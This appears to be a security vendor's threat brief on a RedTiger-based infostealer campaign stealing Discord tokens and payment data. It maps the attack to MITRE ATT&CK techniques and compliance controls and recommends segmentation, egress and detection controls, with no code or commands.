Executive Summary
In early June 2024, cybersecurity researchers uncovered a new campaign in which attackers used a RedTiger-based infostealer to target Discord users. The campaign leveraged the open-source red-team tool RedTiger to build a custom infostealer designed to harvest Discord account credentials and stored payment information by injecting malicious code into Discord’s directories. Victims typically became infected through malicious downloads or phishing websites, unknowingly handing over sensitive data, including authentication tokens and payment details, to the attackers. As a result, stolen Discord accounts were sold or used for further fraud and account takeovers, risking both personal and organizational information leakage.
This incident highlights an escalating trend of using open-source red-team tools for malicious infostealer campaigns, boosting attackers’ agility and reach. It underscores the risk of credential-based attacks on popular platforms, the need for real-time threat detection, and reinforces the importance of continuous endpoint monitoring and stronger egress security controls.
Why This Matters Now
The widespread use of Discord for both personal and professional communication makes it an attractive target for attackers. The adoption of open-source red-team tools like RedTiger by adversaries accelerates the weaponization cycle, meaning organizations and individuals must respond swiftly to evolving infostealer threats. Enhanced security awareness, rapid patching, and stronger access controls are urgently required to mitigate these rapidly spreading attacks.
Attack Path Analysis
Attackers initiated their campaign by leveraging social engineering or malicious payloads to infect systems with a RedTiger-based infostealer, gaining access to Discord credentials and local environments. After establishing initial access, the malware sought elevated privileges to harvest broader and more sensitive data. The infostealer then attempted to move laterally within the victim's environment, potentially targeting additional accounts, applications, or data repositories. Having established persistent communication, the malware connected to external command and control infrastructure to receive further instructions. Stolen data—including Discord tokens and payment information—was exfiltrated over unmonitored or inadequately filtered egress channels. The impact was realized in the form of compromised accounts, financial data loss, and downstream abuse of stolen identities.
Kill Chain Progression
Initial Compromise
Description
User systems were infected with the RedTiger-based infostealer through malicious downloads or phishing, granting attackers initial foothold to harvest Discord data.
MITRE ATT&CK® Techniques
User Execution
Input Capture: Keylogging
Email Collection
Credentials in Files
Data from Local System
Exfiltration Over C2 Channel
Credentials from Password Stores: Credentials from Web Browsers
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Authentication for all system components
Control ID: 8.2.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA (Digital Operational Resilience Act) – ICT Risk Management
Control ID: Art.9(2)
CISA ZTMM 2.0 – Continuous Monitoring and Threat Detection
Control ID: 3.2.2
NIS2 Directive – Policies and Procedures to Assess Effectiveness of Cybersecurity Risk Management
Control ID: Art.21(2)(e)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Computer Games
Gaming platforms face direct Discord account theft targeting player communities, payment data, and virtual assets through RedTiger-based infostealers.
Financial Services
Payment information theft via Discord channels threatens financial institutions with data breaches, requiring enhanced egress security and anomaly detection.
E-Learning
Educational Discord communities vulnerable to credential harvesting attacks, compromising student data and requiring zero trust segmentation for protection.
Information Technology/IT
IT sector faces heightened risk from open-source red-team tool abuse, necessitating threat detection capabilities and secure communication protocols.
Sources
- Hackers steal Discord accounts with RedTiger-based infostealerhttps://www.bleepingcomputer.com/news/security/hackers-steal-discord-accounts-with-redtiger-based-infostealer/Verified
- New Arcane infostealer infects YouTube, Discord users via game cheatshttps://www.bleepingcomputer.com/news/security/new-arcane-infostealer-infects-youtube-discord-users-via-game-cheats/Verified
- Discord Turned Into an Account Stealer by Updated Malwarehttps://www.bleepingcomputer.com/news/security/discord-turned-into-an-account-stealer-by-updated-malware/Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Zero Trust segmentation, strict egress policy, real-time threat detection, and encrypted traffic controls could have broken the kill chain by limiting malware propagation, restricting data egress, and alerting on anomalous infostealer behaviors. CNSF-reinforced boundaries and inspection capabilities hinder east-west movement and covert exfiltration, drastically minimizing blast radius.
Control: Threat Detection & Anomaly Response
Mitigation: Anomalous process or network activity triggers early alerts.
Control: Zero Trust Segmentation
Mitigation: Identity-based least privilege limits attacker's ability to access privileged data.
Control: East-West Traffic Security
Mitigation: Internal traffic inspection blocks unauthorized pivots.
Control: Cloud Firewall (ACF) & Inline IPS (Suricata)
Mitigation: Outbound C2 connections are detected and possibly blocked.
Control: Egress Security & Policy Enforcement
Mitigation: Sensitive outbound data flows are restricted or alerted upon.
Rapid detection and containment limit post-exfiltration business impact.
Impact at a Glance
Affected Business Functions
- User Account Management
- Payment Processing
Estimated downtime: 3 days
Estimated loss: $50,000
The infostealer targets Discord account data, including user tokens, email addresses, multi-factor authentication details, and payment information such as PayPal and credit card details. Additionally, it harvests browser-stored credentials, cookies, and cryptocurrency wallet data, leading to potential unauthorized access and financial fraud.
Recommended Actions
Key Takeaways & Next Steps
- • Enforce granular zero trust segmentation to prevent malware moving laterally and accessing sensitive Discord or credential data.
- • Deploy egress controls and rigorous policy enforcement to restrict unauthorized outbound connections and data exfiltration attempts.
- • Implement advanced threat detection and anomaly response for early warning on infostealer behaviors and suspicious network activity.
- • Ensure encrypted traffic monitoring and high-performance line-rate encryption to avert packet sniffing or data theft in transit.
- • Centralize multicloud visibility and automation to speed incident response and reduce time to containment after detection.
